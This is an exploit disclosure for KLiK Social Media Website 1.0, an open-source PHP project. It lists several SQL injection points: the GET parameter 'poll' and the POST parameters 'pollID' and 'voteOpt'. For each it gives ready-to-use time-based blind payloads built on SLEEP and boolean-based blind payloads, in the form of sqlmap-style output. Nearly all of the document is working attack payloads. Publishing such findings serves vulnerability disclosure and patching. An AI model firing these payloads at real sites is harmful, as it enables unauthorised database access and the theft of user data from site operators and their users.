# Exploit Title: KLiK Social Media Website 1.0 - 'Multiple' SQLi # Date: April 1st, 2022 # Exploit Author: corpse # Vendor Homepage: https://github.com/msaad1999/KLiK-SocialMediaWebsite # Software Link: https://github.com/msaad1999/KLiK-SocialMediaWebsite # Version: 1.0 # Tested on: Debian 11 Parameter: poll (GET) Type: time-based blind Title: MySQL time-based blind - Parameter replace (ELT) Payload: poll=ELT(1079=1079,SLEEP(5)) Parameter: pollID (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: voteOpt=26&voteSubmit=Submit Vote&pollID=15 AND 1248=1248 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: voteOpt=26&voteSubmit=Submit Vote&pollID=15 AND (SELECT 7786 FROM (SELECT(SLEEP(5)))FihS) Parameter: voteOpt (POST) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: voteOpt=(SELECT (CASE WHEN (7757=7757) THEN 26 ELSE (SELECT 1548 UNION SELECT 8077) END))&voteSubmit=Submit Vote&pollID=15 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: voteOpt=26 AND (SELECT 8024 FROM (SELECT(SLEEP(5)))DZnp)&voteSubmit=Submit Vote&pollID=15